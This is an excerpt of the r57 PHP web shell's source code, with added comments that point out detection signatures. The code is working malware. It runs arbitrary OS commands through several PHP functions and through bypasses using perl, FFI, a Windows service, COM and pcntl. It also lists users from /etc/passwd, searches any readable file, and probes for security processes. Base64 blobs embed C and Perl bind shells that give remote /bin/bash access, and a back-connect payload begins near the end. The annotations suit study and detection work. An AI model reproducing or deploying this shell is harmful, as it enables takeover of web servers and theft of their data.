2916'find /var/ error.log files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name error.log >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2917
2918'find /var/ "*_log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2919
2920'find /var/ "*.log" files >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt'=>'find /var/ -type f -name "*.log" >> '.$tempdir.'grep.txt;cat '.$tempdir.'grep.txt',
2921
2922'----------------------------------------------------------------------------------------------------'=>'ls -la'
2923
2924);
2925
// Reusable HTML fragments for the panel UI. They are plain markup with no
// dynamic content; the literal strings are stable across requests and can serve
// as response-body match strings when hunting for this panel.

// Section header: opening part, closing part, and the wrapping table.
$table_up1 = '<tr><td bgcolor=#cccccc><font face=Verdana size=-2><b><div align=center>:: ';
$table_up2 = ' ::</div></b></font></td></tr><tr><td>';
$table_up3 = '<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc>';
$table_end1 = '</td></tr>';

// Small inline decorations.
$arrow = ' <font face=Webdings color=gray>4</font>';
$lb = '<font color=black>[</font>';
$rb = '<font color=black>]</font>';
$font = '<font face=Verdana size=-2>';

// Table and form open/close tags; every form posts back to the same script.
$ts = '<table class=table1 width=100% align=center>';
$te = '</table>';
$fs = '<form name=form method=POST>';
$fe = '</form>';
2949
2950
2951
// Request handler: when the query string carries a `users` parameter, print the
// account names parsed from /etc/passwd and stop processing the request.
// Detection: a GET containing `users` answered by a bare <center> list of names
// followed by a "[ BACK ]" link is a recognisable request/response pair in web
// logs and proxy captures.
// Both $user and $_SERVER['PHP_SELF'] are echoed without HTML escaping.
if(isset($_GET['users']))
 {
 // get_users() returns 0 when the file could not be read; the localized
 // message key <language>_text96 is shown in that case.
 if(!$users=get_users('/etc/passwd')) { echo "<center><font face=Verdana size=-2 color=red>".$lang[$language.'_text96']."</font></center>"; }
 else
 {
 echo '<center>';
 foreach($users as $user) { echo $user."<br>"; }
 echo '</center>';
 }
 // die() ends the request here, so none of the code below runs for `users`.
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
 }
2973
2974
2975
// Working-directory selection and platform guess.
// The POST field `dir` is used as-is: no validation, no base-directory check.
// If chdir() is not available the code tries chroot() with the same value.
if (!empty($_POST['dir'])) { if(@function_exists('chdir')){@chdir($_POST['dir']);} else if(@function_exists('chroot')){ @chroot($_POST['dir']);}; }
// $dir is the posted value, or getcwd() when nothing was posted. When nothing was
// posted and chdir() does not exist, $dir is never assigned on this line.
if (empty($_POST['dir'])){if(@function_exists('chdir')){$dir = @getcwd();};}else{$dir=$_POST['dir'];}
$unix = 0;
// A second character of ':' (drive letter, e.g. "C:") is treated as Windows;
// anything else sets $unix = 1.
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
// With no directory at all, fall back to the OS environment variable and then
// php_uname(); a value starting with "win" (case-insensitive) means Windows.
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = @php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
 {
 // NOTE(review): eregi() was removed in PHP 7.0, which dates the code to the PHP 4/5 era.
 if(@eregi("^win",$os)) { $unix = 0; }
 else { $unix = 1; }
 }
 }
3005
3006
3007
// Request handler for the text-search form. It runs when the POST body carries
// cmd=search_text together with non-empty s_dir and s_text; s_mask is used as an
// extension filter only when the `m` field is also set.
// Detection: that combination of POST field names (cmd=search_text, s_dir,
// s_text, s_mask, m) is a usable request-body signature for WAF rules and log review.
// Every value goes to SearchResult unvalidated, so the search can cover any
// directory the PHP process is able to read.
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
 {
 // $head is defined outside this part of the file.
 echo $head;
 if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
 else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
 // Word-boundary matching off, case-insensitive matching on.
 $sr->SearchText(0,0);
 $res = $sr->GetResultFiles();
 $found = $sr->GetMatchesCount();
 $titles = $sr->GetTitles();
 $r = "";
 if($found > 0)
 {
 // One header row per file, then one row per matching line (line number, text).
 $r .= "<TABLE width=100%>";
 foreach($res as $file=>$v)
 {
 $r .= "<TR>";
 $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3);
 // Paths are shown with backslashes on Windows.
 $r .= (!$unix)? str_replace("/","\\",$file) : $file;
 $r .= "</b></font></ TD>";
 $r .= "</TR>";
 foreach($v as $a=>$b)
 {
 $r .= "<TR>";
 $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
 // $b is file content that went through strip_tags() in SearchText(), not htmlspecialchars().
 $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
 $r .= "</TR>\n";
 }
 }
 $r .= "</TABLE>";
 echo $r;
 }
 else
 {
 // Nothing matched: localized message key <language>_text56.
 echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
 }
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
 die();
 }
3083
3084
3085
/*if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }*/
// Capability probe: run `echo abcr57` through ex() and look for "r57" at offset 3
// of the output. Any other result (including no output) sets $safe_mode = 1,
// meaning command execution did not work.
// Detection: the probe is issued whenever execution reaches this line, so a
// process-creation event with the command line `echo abcr57` under the web
// server account is a high-confidence indicator for this shell family.
if(strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }else{$safe_mode = 0;}
// Server banner for display, "-" when the environment variable is missing.
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
3093
3094
3095
/**
 * Build a run of $i padding characters for layout purposes.
 *
 * @param int $i number of repetitions
 * @return string the repeated padding string
 */
function ws($i)
{
    $padding = @str_repeat(" ", $i);
    return $padding;
}
3103
3104
3105
/**
 * Command-execution primitive of the panel: hands $cfe to the operating system
 * through the first PHP process-spawning function that exists, in this order:
 * exec, shell_exec, system, passthru, popen, proc_open.
 *
 * Analyst notes:
 *  - $cfe is never validated or escaped here; whatever the caller passes is the command line.
 *  - Every call is prefixed with @, so nothing reaches the PHP error log.
 *  - The function_exists() probing is presumably aimed at hosts that restrict
 *    some of these functions (the file header also touches disable_functions).
 *    Restricting all six, plus alerting on shells spawned by the web server
 *    account, addresses every branch below.
 *  - $unix and $tempdir are declared global but not used in this function.
 *
 * @param string $cfe command line to run
 * @return string command output passed through htmlspecialchars()
 */
function ex($cfe)
{global $unix,$tempdir;
 $res = '';
 if (!empty($cfe))
 {
 if(@function_exists('exec'))
 {
 // exec() fills $res with an array of output lines; they are re-joined with "\n".
 @exec($cfe,$res);
 $res = join("\n",$res);
 }
 elseif(@function_exists('shell_exec'))
 {
 $res = @shell_exec($cfe);
 }
 elseif(@function_exists('system'))
 {
 // Output is captured with output buffering. The argument is the single-quoted
 // literal '$cfe' (no variable interpolation); that literal is a stable string
 // for static signatures.
 @ob_start();
 @system('$cfe');
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(@function_exists('passthru'))
 {
 @ob_start();
 @passthru($cfe);
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(@function_exists('popen') && @is_resource($f = @popen($cfe,"r")))
 {
 // Read the pipe in 1024-byte chunks, with fread() or fgets(), whichever exists.
 $res = "";
 if(@function_exists('fread') && @function_exists('feof')){
 while(!@feof($f)) { $res .= @fread($f,1024); }
 }else if(@function_exists('fgets') && @function_exists('feof')){
 while(!@feof($f)) { $res .= @fgets($f,1024); }
 }
 @pclose($f);
 }
 elseif(@function_exists('proc_open') && @is_resource($f = @proc_open($cfe,array(1 => array("pipe", "w")),$pipes)))
 {
 // Only stdout (descriptor 1) is piped back.
 $res = "";
 if(@function_exists('fread') && @function_exists('feof')){
 while(!@feof($pipes[1])) {$res .= @fread($pipes[1], 1024);}
 }else if(@function_exists('fgets') && @function_exists('feof')){
 while(!@feof($pipes[1])) {$res .= @fgets($pipes[1], 1024);}
 }
 @proc_close($f);
 }
 // This else belongs to the outer `if (!empty($cfe))`, so it is taken when $cfe is empty.
 }else{$res = safe_ex($cfe);}
 return htmlspecialchars($res);
}
3207
3208
3209
3210
3211
/**
 * Alternative command runner that avoids PHP's own process functions and goes
 * through loaded extensions instead. Branch order: perl extension; on Windows
 * ffi (kernel32 WinExec), win32service, win32std, then COM WScript.Shell; after
 * those, pcntl_fork/pcntl_exec with a perl interpreter.
 *
 * Host artefacts visible in this code, useful for detection and triage:
 *  - output is redirected to a scratch file $tempdir . uniqid('NJ') (prefix
 *    'pcntl' in the pcntl branch) that is read back and then unlinked;
 *  - the win32service branch creates, starts, stops and deletes a service whose
 *    name and display name are uniqid('NJ') and whose binary is cmd.exe;
 *  - every Windows branch launches cmd.exe /c with the output redirected, so the
 *    process tree shows cmd.exe under the web server / PHP worker;
 *  - the pcntl branch execs /usr/bin/perl or /usr/local/bin/perl with an -e argument.
 * Keeping perl, ffi, win32service, win32std, com_dotnet and pcntl out of the web
 * SAPI removes every branch.
 *
 * moreread() is defined elsewhere in the file; presumably it returns a file's
 * contents - confirm there.
 *
 * @param string $cfe command line to run
 * @return string htmlspecialchars() of whatever ended up in $res
 */
function safe_ex($cfe)
{global $unix,$tempdir;
 $res = '';
 if (!empty($cfe))
 {
 if(extension_loaded('perl')){
 // Embedded Perl interpreter; output captured through output buffering.
 @ob_start();
 $safeperl=new perl();
 $safeperl->eval("system('$cfe')");
 $res = @ob_get_contents();
 @ob_end_clean();
 }
 elseif(!$unix && extension_loaded('ffi'))
 {
 // Windows: call WinExec from kernel32.dll, redirecting output to the scratch file.
 $output=$tempdir.uniqid('NJ');
 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
 if(!@function_exists('escapeshellarg')){$res=$api->WinExec("cmd.exe /c $cfe >\"$output\"",0);}
 else{$res=$api->WinExec("cmd.exe /c ".@escapeshellarg($cfe)." >\"$output\"",0);}
 // Polls once per second until the scratch file exists; the loop has no timeout.
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix && extension_loaded('win32service'))
 {
 // Windows: a short-lived service wrapping cmd.exe; service create/delete
 // events with an 'NJ'-prefixed name are the artefact to look for.
 $output=$tempdir.uniqid('NJ');
 $n_ser=uniqid('NJ');
 if(!@function_exists('escapeshellarg'))
 {@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c $cfe >\"$output\""));}
 else{@win32_create_service(array('service'=>$n_ser,'display'=>$n_ser,'path'=>'c:\\windows\\system32\\cmd.exe','params'=>"/c ".@escapeshellarg($cfe)." >\"$output\""));}
 @win32_start_service($n_ser);
 @win32_stop_service($n_ser);
 @win32_delete_service($n_ser);
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix && extension_loaded("win32std"))
 {
 // Windows: win32std's win_shell_execute(), reaching cmd.exe through a relative ..\ path.
 $output=$tempdir.uniqid('NJ');
 if(!@function_exists('escapeshellarg')){@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
 else{@win_shell_execute('..\..\..\..\..\..\..\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
 while(!@file_exists($output))sleep(1);
 $res=moreread($output);
 @unlink($output);
 }
 elseif(!$unix)
 {
 // Windows catch-all: COM automation of WScript.Shell. This branch does not
 // check that the COM class exists and does not wait for the scratch file.
 $output=$tempdir.uniqid('NJ');
 $suntzu = new COM("WScript.Shell");
 if(!@function_exists('escapeshellarg')){$suntzu->Run('c:\windows\system32\cmd.exe /c '.$cfe.' > "'.$output.'"');}
 else{$suntzu->Run('c:\windows\system32\cmd.exe /c '.@escapeshellarg($cfe).' > "'.$output.'"');}
 $res=moreread($output);
 @unlink($output);
 }
 elseif(@function_exists('pcntl_exec') && @function_exists('pcntl_fork'))
 {
 // Unix: fork, then exec perl in the child. The status text built in $res is
 // replaced by the scratch-file contents further down.
 $res = '[~] Blind Command Execution via [pcntl_exec]\n\n';
 $output=$tempdir.uniqid('pcntl');
 $pid = @pcntl_fork();
 if ($pid == -1) {
 $res .= '[-] Could not children fork. Exit';
 } else if ($pid) {
 // Parent: $status is not assigned anywhere in this function before this call.
 if (@pcntl_wifexited($status)){$res .= '[+] Done! Command "'.$cfe.'" successfully executed.';}
 else {$res .= '[-] Error. Command incorrect.';}
 } else {
 // Child: $cfe is rebound to the argument array handed to perl.
 $cfe = array(" -e 'system(\"$cfe > $output\")'");
 if(@pcntl_exec('/usr/bin/perl',$cfe)) exit(0);
 if(@pcntl_exec('/usr/local/bin/perl',$cfe)) exit(0);
 die();
 }
 $res=moreread($output);
 @unlink($output);
 }
/* elseif(1)
 {

 }
*/
 }
 return htmlspecialchars($res);
}
3373
3374
3375
/**
 * Extract the first colon-separated field of every line of a passwd-style file.
 *
 * The file is read with moreread() and, if that yields nothing, with readzlib()
 * (both defined elsewhere in the file). The visible caller passes '/etc/passwd',
 * so this is the account-enumeration step of the panel.
 *
 * @param string $filename path of the file to parse
 * @return array|int list of first fields, or 0 when neither reader returned data
 */
function get_users($filename)
{
 $users = $rows = array();
 $rows=@explode("\n",moreread($filename));
 // Second attempt through the zlib-based reader when the first line is empty.
 if(!$rows[0]){$rows=@explode("\n",readzlib($filename));}
 if(!$rows[0]) return 0;
 foreach ($rows as $string)
 {
 $user = @explode(":",trim($string));
 // Lines starting with '#' are skipped. The test is made on the untrimmed
 // line, and blank lines contribute an empty name.
 if(substr($string,0,1)!='#') array_push($users,$user[0]);
 }
 return $users;
}
3401
/**
 * Print a red error banner.
 *
 * The message text comes from the global $lang table under the key
 * "<language>_err<n>"; $txt, when non-empty, is appended after a space.
 * Neither value is HTML-escaped.
 *
 * @param int|string $n   error number used to build the message key
 * @param string     $txt optional extra text
 * @return null
 */
function err($n,$txt='')
{
    $messageKey = $GLOBALS['language'].'_err'.$n;
    $extra = empty($txt) ? '' : " $txt";

    echo '<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#cccccc><font color=red face=Verdana size=-2><div align=center><b>';
    echo $GLOBALS['lang'][$messageKey];
    echo $extra;
    echo '</b></div></font></td></tr></table>';

    return null;
}
3417
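/**
 * Render a numeric file mode as an `ls -l` style string such as "-rwxr-xr-x".
 *
 * Returns 0 instead of a string when the global $unix flag is false.
 *
 * @param int $mode st_mode value, e.g. from fileperms()
 * @return string|int ten-character mode string, or 0 on non-Unix hosts
 */
function perms($mode)
{
    if (!$GLOBALS['unix']) return 0;

    // The file type is a value stored in the top four bits of the mode, not a
    // set of independent flags. It has to be compared after masking: testing
    // single bits reports a symlink (0xA000) as a character device (0x2000) and
    // a socket (0xC000) as a directory (0x4000).
    switch ($mode & 0xF000) {
        case 0x1000: $type = 'p'; break; // FIFO
        case 0x2000: $type = 'c'; break; // character device
        case 0x4000: $type = 'd'; break; // directory
        case 0x6000: $type = 'b'; break; // block device
        case 0x8000: $type = '-'; break; // regular file
        case 0xA000: $type = 'l'; break; // symbolic link
        case 0xC000: $type = 's'; break; // socket
        default:     $type = 'u';        // unknown
    }

    $owner = array(
        'read'    => ($mode & 00400) ? 'r' : '-',
        'write'   => ($mode & 00200) ? 'w' : '-',
        'execute' => ($mode & 00100) ? 'x' : '-',
    );
    $group = array(
        'read'    => ($mode & 00040) ? 'r' : '-',
        'write'   => ($mode & 00020) ? 'w' : '-',
        'execute' => ($mode & 00010) ? 'x' : '-',
    );
    $world = array(
        'read'    => ($mode & 00004) ? 'r' : '-',
        'write'   => ($mode & 00002) ? 'w' : '-',
        'execute' => ($mode & 00001) ? 'x' : '-',
    );

    // setuid / setgid / sticky replace the execute column: lower case when the
    // execute bit is also set, upper case when it is not.
    if ($mode & 0x800) $owner['execute'] = ($owner['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x400) $group['execute'] = ($group['execute'] == 'x') ? 's' : 'S';
    if ($mode & 0x200) $world['execute'] = ($world['execute'] == 'x') ? 't' : 'T';

    $s  = $type;
    $s .= $owner['read'].$owner['write'].$owner['execute'];
    $s .= $group['read'].$group['write'].$group['execute'];
    $s .= $world['read'].$world['write'].$world['execute'];

    return trim($s);
}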
3475
/**
 * Build the markup of one <input> element.
 *
 * Only the value attribute is wrapped in double quotes; type, name and size are
 * written bare, and none of the arguments is HTML-escaped.
 *
 * @param string $type    input type
 * @param string $name    field name
 * @param int    $size    size attribute, left out when equal to 0
 * @param string $value   initial value
 * @param mixed  $checked truthy to add the `checked` attribute
 * @return string the element markup
 */
function in($type,$name,$size,$value,$checked=0)
{
    $attributes = "type=".$type." name=".$name." ";
    if ($size != 0) {
        $attributes .= "size=".$size." ";
    }
    $attributes .= "value=\"".$value."\"";

    $checkedFlag = $checked ? " checked" : "";

    return "<input ".$attributes.$checkedFlag.">";
}
3491
/**
 * Run `which <name>` through ex() to test whether a program is on the PATH.
 * $pr is interpolated into the command line unquoted.
 * Presumably fed from the tool-name lists near the top of the file ($userful,
 * $downloaders) - confirm against the callers.
 *
 * @param string $pr program name
 * @return string|false HTML-escaped output of `which`, or false when it is empty
 */
function which($pr)
{
$path = '';
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return false; }
}
3503
/**
 * Look for a running process whose listing matches $pr: `ps -aux | grep` on
 * Unix, `tasklist | findstr` on Windows, both through ex().
 * $pr is interpolated into the command line without escaping.
 * Presumably used with the $danger list of security-product names near the top
 * of the file - confirm against the callers. Process-list queries for such
 * names issued by the web server account are a behavioural indicator.
 *
 * @param string $pr process name or pattern
 * @return string|false HTML-escaped matching lines, or false when there are none
 */
function ps($pr)
{global $unix;
$path = '';
if($unix){$path = ex("ps -aux | grep $pr | grep -v 'grep'");}
else{$path = ex("tasklist | findstr \"$pr\"");}
if(!empty($path)) { return $path; } else { return false; }
}
3517
/**
 * Run `locate <pattern>` through ex() and return what it prints.
 * $pr is interpolated into the command line unquoted.
 *
 * @param string $pr file name or pattern handed to locate
 * @return string|false HTML-escaped output, or false when it is empty
 */
function locate($pr)
{
$path = '';
$path = ex("locate $pr");
if(!empty($path)) { return $path; } else { return false; }
}
3529
/**
 * Base64-decode $text and write the result to $fname via morewrite() (defined
 * elsewhere in the file); err(0) is printed when the write reports failure.
 * Presumably the routine that drops the base64 blobs embedded further down
 * ($port_bind_bd_c, $back_connect, $datapipe_c, ...) onto disk - confirm against
 * the callers. New files written by the PHP process into temp directories are
 * the artefact to watch for.
 *
 * @param string $fname destination path
 * @param string $text  base64-encoded file body
 * @return void
 */
function cf($fname,$text)
{
 if(!morewrite($fname,@base64_decode($text))){err(0);};
}
3537
/**
 * Build one two-column table row: a right-aligned label cell of the given
 * width and a left-aligned content cell. Arguments are inserted unescaped.
 *
 * @param int|string $l  width of the first cell, in percent
 * @param string     $t1 content of the first cell
 * @param string     $t2 content of the second cell
 * @return string the <tr> markup
 */
function sr($l,$t1,$t2)
{
    $labelCell = "<td class=td1 width=".$l."% align=right>".$t1."</td>";
    $valueCell = "<td class=td1 align=left>".$t2."</td>";

    return "<tr class=tr1>".$labelCell.$valueCell."</tr>";
}
3545
// Defined only when no function of this name exists yet.
if (!@function_exists("view_size"))
{
    /**
     * Format a byte count with a B / KB / MB / GB suffix, rounded to two decimals
     * for the scaled units.
     *
     * @param int|float $size size in bytes
     * @return string human-readable size
     */
    function view_size($size)
    {
        // Largest unit first; the first threshold reached decides the suffix.
        $units = array(
            1073741824 => " GB",
            1048576    => " MB",
            1024       => " KB",
        );
        foreach ($units as $threshold => $suffix) {
            if ($size >= $threshold) {
                return @round($size / $threshold * 100) / 100 . $suffix;
            }
        }
        return $size . " B";
    }
}
3567
/**
 * Recursively collect the paths of all files below $dir.
 *
 * Sub-directories are followed without a depth limit. When $types is given it is
 * a ';'-separated list of extensions including the leading dot (the comparison
 * is against the text from the last '.' of the file name onwards). All
 * filesystem errors are suppressed with @, so unreadable directories are
 * skipped silently.
 *
 * @param string $dir   directory to walk
 * @param string $types optional ';'-separated extension filter, e.g. ".php;.inc"
 * @return array list of file paths built as "$dir/$file"
 */
function DirFilesR($dir,$types='')
 {
 $files = Array();
 if(($handle = @opendir($dir)))
 {
 while (false !== ($file = @readdir($handle)))
 {
 if ($file != "." && $file != "..")
 {
 if(@is_dir($dir."/".$file))
 $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
 else
 {
 // Extension = substring starting at the last '.'; strrpos() returns false
 // for names without a dot.
 $pos = @strrpos($file,".");
 $ext = @substr($file,$pos,@strlen($file)-$pos);
 if($types)
 {
 if(@in_array($ext,explode(';',$types)))
 $files[] = $dir."/".$file;
 }
 else
 $files[] = $dir."/".$file;
 }
 }
 }
 @closedir($handle);
 }
 return $files;
 }
3625
/**
 * Line-by-line text search over every file below one or more directories.
 *
 * The visible caller builds it from the POST fields s_dir, s_text and s_mask,
 * so its job inside the panel is locating strings (for example credentials) in
 * any file the PHP process can read. Results hold the matching lines with the
 * hit wrapped in highlight markup.
 *
 * NOTE(review): the constructor uses the PHP 4 convention of a method named
 * after the class; since PHP 8.0 such a method is no longer treated as a constructor.
 */
class SearchResult
 {
 // Raw search text as supplied by the caller.
 var $text;
 // Flat list of file paths gathered by DirFilesR().
 var $FilesToSearch;
 // Map: file path => (1-based line number => highlighted line).
 var $ResultFiles;
 // Number of files in $FilesToSearch.
 var $FilesTotal;
 // Total number of matches over all files.
 var $MatchesCount;
 // Declared with this spelling; the methods use $this->FileMatchesCount instead.
 var $FileMatschesCount;
 // getmicrotime() value taken in the constructor.
 var $TimeStart;
 // Elapsed seconds, set at the end of SearchText().
 var $TimeTotal;
 // Initialised to an empty array and not filled in anywhere in this class.
 var $titles;
 // $dir is a ';'-separated list of directories, $filter a ';'-separated
 // extension list that is passed on to DirFilesR().
 function SearchResult($dir,$text,$filter='')
 {
 $dirs = @explode(";",$dir);
 $this->FilesToSearch = Array();
 for($a=0;$a<count($dirs);$a++)
 $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
 $this->text = $text;
 $this->FilesTotal = @count($this->FilesToSearch);
 $this->TimeStart = getmicrotime();
 $this->MatchesCount = 0;
 $this->ResultFiles = Array();
 $this->FileMatchesCount = Array();
 $this->titles = Array();
 }
 // Plain accessors for the fields above.
 function GetFilesTotal() { return $this->FilesTotal; }
 function GetTitles() { return $this->titles; }
 function GetTimeTotal() { return $this->TimeTotal; }
 function GetMatchesCount() { return $this->MatchesCount; }
 function GetFileMatchesCount() { return $this->FileMatchesCount; }
 function GetResultFiles() { return $this->ResultFiles; }
 // Run the search. $phrase truthy wraps each word in \b word boundaries;
 // $case falsy adds the case-insensitive modifier.
 function SearchText($phrase=0,$case=0) {
 // The search text is split on spaces and the words are joined with '|' into
 // one alternation group. The words are placed into the pattern without
 // preg_quote(), so regex metacharacters in the input are interpreted.
 $qq = @explode(' ',$this->text);
 $delim = '|';
 if($phrase)
 foreach($qq as $k=>$v)
 $qq[$k] = '\b'.$v.'\b';
 $words = '('.@implode($delim,$qq).')';
 $pattern = "/".$words."/";
 if(!$case)
 $pattern .= 'i';
 foreach($this->FilesToSearch as $k=>$filename)
 {
 $this->FileMatchesCount[$filename] = 0;
 // Each file is loaded completely into memory as an array of lines.
 $FileStrings = @file($filename) or @next;
 for($a=0;$a<@count($FileStrings);$a++)
 {
 $count = 0;
 $CurString = $FileStrings[$a];
 $CurString = @Trim($CurString);
 // Tags are stripped before matching; the text is not passed through htmlspecialchars().
 $CurString = @strip_tags($CurString);
 $aa = '';
 if(($count = @preg_match_all($pattern,$CurString,$aa)))
 {
 // Wrap every hit in highlight markup and store the line under its 1-based number.
 $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
 $this->ResultFiles[$filename][$a+1] = $CurString;
 $this->MatchesCount += $count;
 $this->FileMatchesCount[$filename] += $count;
 }
 }
 }
 $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
 }
 }
3753
/**
 * Current Unix time as a float with microsecond resolution.
 *
 * microtime() without arguments returns "<fraction> <seconds>"; the two parts
 * are converted to float and added.
 *
 * @return float seconds since the epoch
 */
function getmicrotime()
{
    $parts = @explode(" ", @microtime());
    $fraction = (float)$parts[0];
    $seconds = (float)$parts[1];

    return ($fraction + $seconds);
}
3763
3764$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
3765
3766A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
3767
3768GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
3769
3770b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
3771
3772pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
3773
3774NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
3775
3776ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
3777
3778ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
3779
37807DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
3781
37829tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
3783
37842ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
3785
3786dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
3787
3788lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
3789
3790$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
3791
3792VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
3793
3794JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
3795
3796TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
3797
3798lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
3799
3800Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
3801
3802Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
3803
3804lIENPTk47DQpleGl0IDA7DQp9DQp9";
3805
3806$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
3807
